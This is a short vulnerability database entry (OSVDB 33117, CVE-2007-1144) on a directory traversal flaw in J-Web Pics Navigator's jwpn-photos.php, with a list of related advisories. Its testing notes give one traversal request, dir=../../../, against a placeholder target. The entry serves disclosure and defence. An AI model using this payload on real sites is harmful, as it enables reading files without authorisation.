J-Web Pics Navigator jwpn-photos.php dir Variable Traversal Arbitrary File Access

2007-02-21T08:03:48
ID OSVDB:33117
Type osvdb
Reporter OSVDB
Modified 2007-02-21T08:03:48

Description

Manual Testing Notes

http://[target]/jwpn-photos.php?dir=../../../

References:

Vendor URL: http://www.jeunes-webmasters.com/ Secunia Advisory ID:24273 Related OSVDB ID: 33118 Other Advisory URL: http://forums.avenir-geopolitique.net/viewtopic.php?t=2692 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0411.html ISS X-Force ID: 32646 FrSIRT Advisory: ADV-2007-0711 CVE-2007-1144 Bugtraq ID: 22681